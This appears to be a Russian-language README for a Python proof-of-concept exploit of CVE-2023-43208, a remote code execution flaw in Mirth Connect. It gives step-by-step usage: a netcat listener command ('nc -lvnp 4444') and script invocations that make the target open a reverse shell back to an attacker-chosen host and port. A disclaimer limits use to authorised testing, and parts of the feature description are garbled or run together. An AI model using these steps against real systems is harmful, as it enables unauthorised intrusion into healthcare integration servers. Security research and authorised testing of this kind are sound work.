
PoC для эксплуатации RCE CVE-2023-43208.
PoC-скрипт на Python, нацеленный на CVE-2023-43208 в Mirth Connect.
Используйте только в средах, которыми вы владеете или для тестирования которых у вас есть явное разрешение. Этот репозиторий предназначен для исследований в области безопасности, проверки и защитного тестирования. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.
exp.py — это версия PoC с минимальными зависимостями, которая:
/api/server/version4.4.1/api/users, если цель выглядит уязвимойПо умолчанию скрипт использует HTTPS, переключиться на HTTP можно с помощью --http.
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: целевой URL-адрес или хост Mirth Connect-lh, --lhost: локальный хост/IP для обратного подключения-lp, --lport: локальный порт для прослушивания--http: принудительно использовать HTTP вместо HTTPS (по умолчанию используется HTTPS)Сначала запустите слушатель:
nc -lvnp 4444
Запустите скрипт:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
Для цели, работающей только по HTTP:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1.K3ysTr0K3R и Chocapikkpredyy